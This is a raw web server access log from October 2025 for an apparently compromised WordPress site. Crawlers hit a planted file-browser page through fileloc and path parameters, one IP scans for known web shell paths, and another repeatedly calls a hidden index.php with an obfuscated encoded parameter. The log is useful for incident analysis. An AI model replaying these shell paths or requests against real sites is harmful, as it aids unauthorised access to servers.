66.249.69.128 - - [30/Oct/2025:05:40:58 +1000] "GET /shopbrand/1665742230.shtm HTTP/1.1" 200 26418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:01 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/about-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 9812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:05 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:41:06 +1000] "GET /shopbrand/1665761454.shtm HTTP/1.1" 200 24330 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:10 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/admin-menu-rtl.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:14 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:17 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/admin-menu-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 6725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:41:23 +1000] "GET /shopbrand/941106764.shtm HTTP/1.1" 200 26597 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:24 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:41:30 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303334302p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363734302q3465663266336435323561373562633032313463396330656666336238623565222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:05:41:30 +1000] "GET /shopbrand/1665794971.shtm HTTP/1.1" 200 25112 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:05:41:30 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php&path=/home/region-gk.ru/data/www/region-gk.ru HTTP/1.1" 200 25468 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:31 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:35 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:41:38 +1000] "GET /shopbrand/941104016.shtm HTTP/1.1" 200 25224 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:39 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:43 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:41:45 +1000] "GET /shopbrand/941089045.shtm HTTP/1.1" 200 24111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:41:48 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/admin-menu-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 6725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:52 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/admin-menu-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 6725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:41:56 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/site-icon-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 4391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:42:00 +1000] "GET /shopbrand/542917414.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/nav-menus-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 7364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:01 +1000] "GET /shopbrand/1665771810.shtm HTTP/1.1" 200 26180 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:05:42:03 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303337332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363737332q6162633638313032303865363534616337626666636463376639363237653532222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:42:04 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css/admin-menu-rtl.min.css&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/css HTTP/2.0" 200 6725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:42:09 +1000] "GET /shopbrand/440991418.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/align-right.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3155 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:09 +1000] "GET /shopbrand/446351436.shtm HTTP/1.1" 200 29515 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:05:42:09 +1000] "GET /shopbrand/1665740891.shtm HTTP/1.1" 200 25077 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:42:13 +1000] "GET /shopbrand/440549463.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/align-right.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3155 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:16 +1000] "GET /shopbrand/1665797815.shtm HTTP/1.1" 200 24054 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:42:17 +1000] "GET /shopbrand/435148331.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images/align-right.png&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/images HTTP/2.0" 200 3155 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
172.81.132.160 - - [30/Oct/2025:05:42:19 +1000] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 301 169 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:42:21 +1000] "GET /shopbrand/369031322.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:24 +1000] "GET /shopbrand/1665792369.shtm HTTP/1.1" 200 24941 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.81.132.160 - - [30/Oct/2025:05:42:25 +1000] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 200 5719 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:42:28 +1000] "GET /shopbrand/300996702.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:31 +1000] "GET /shopbrand/1665749173.shtm HTTP/1.1" 200 27002 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:42:33 +1000] "GET /shopbrand/300595185.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:42:33 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303430332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363830332q6361613836653962353037393765313939316132633039616430646634613139222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
172.81.132.160 - - [30/Oct/2025:05:42:35 +1000] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 200 5667 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.16.195.25 - - [30/Oct/2025:05:42:35 +1000] "GET / HTTP/1.1" 200 3405 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:42:38 +1000] "GET /shopbrand/543501171.shtm?path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 10936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
172.81.132.160 - - [30/Oct/2025:05:42:40 +1000] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 169 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:42:42 +1000] "GET /shopbrand/369031322.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-new.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 11324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:42:46 +1000] "GET /shopbrand/369031322.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-edit.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:46 +1000] "GET /shopbrand/941079386.shtm HTTP/1.1" 200 24757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.81.132.160 - - [30/Oct/2025:05:42:47 +1000] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 5691 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:42:49 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-new.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 11324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:52 +1000] "GET /shopbrand/1665770317.shtm HTTP/1.1" 200 27396 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:42:52 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-new.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 11324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:42:56 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-edit.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:42:59 +1000] "GET /shopbrand/1665795117.shtm HTTP/1.1" 200 25729 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:43:00 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-edit.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
172.81.132.160 - - [30/Oct/2025:05:43:04 +1000] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 200 5687 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.171.207.35 - - [30/Oct/2025:05:43:05 +1000] "GET /shopbrand/543501171.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/user-edit.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 16482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [30/Oct/2025:05:43:05 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303433352p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363833352q3931336633306437366165386534333662343637316136663366393930656239222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:43:09 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/tesT5K9.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:43:13 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/tesT5K9.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:43:14 +1000] "GET /shopbrand/941086329.shtm HTTP/1.1" 200 27480 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:43:17 +1000] "GET /shopbrand/543501171.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/tesT5K9.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
172.81.132.160 - - [30/Oct/2025:05:43:20 +1000] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 200 5728 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.69.128 - - [30/Oct/2025:05:43:22 +1000] "GET /shopbrand/1665753276.shtm HTTP/1.1" 200 25125 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:43:23 +1000] "GET /shopbrand/369031322.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/tesT5K9.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 5228 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:43:27 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/UWxzIVB7JRF.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
172.81.132.160 - - [30/Oct/2025:05:43:28 +1000] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 301 169 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.69.128 - - [30/Oct/2025:05:43:30 +1000] "GET /shopbrand/941098578.shtm HTTP/1.1" 200 25467 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.35 - - [30/Oct/2025:05:43:33 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/yRMeV7TjPUG.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.69.128 - - [30/Oct/2025:05:43:39 +1000] "GET /shopbrand/1665769078.shtm HTTP/1.1" 200 25761 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.81.132.160 - - [30/Oct/2025:05:43:39 +1000] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 200 5710 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.16.195.25 - - [30/Oct/2025:05:43:39 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737303436392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313736363836392q6137336537646136323962316332663531616434343831393433366136613132222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
20.171.207.35 - - [30/Oct/2025:05:43:42 +1000] "GET /shopbrand/300996702.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/UWxzIVB7JRF.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.35 - - [30/Oct/2025:05:43:49 +1000] "GET /shopbrand/300595185.shtm?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-admin/yRMeV7TjPUG.php&path=/home/region-gk.ru/data/www/region-gk.ru/wp-admin HTTP/2.0" 200 37820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
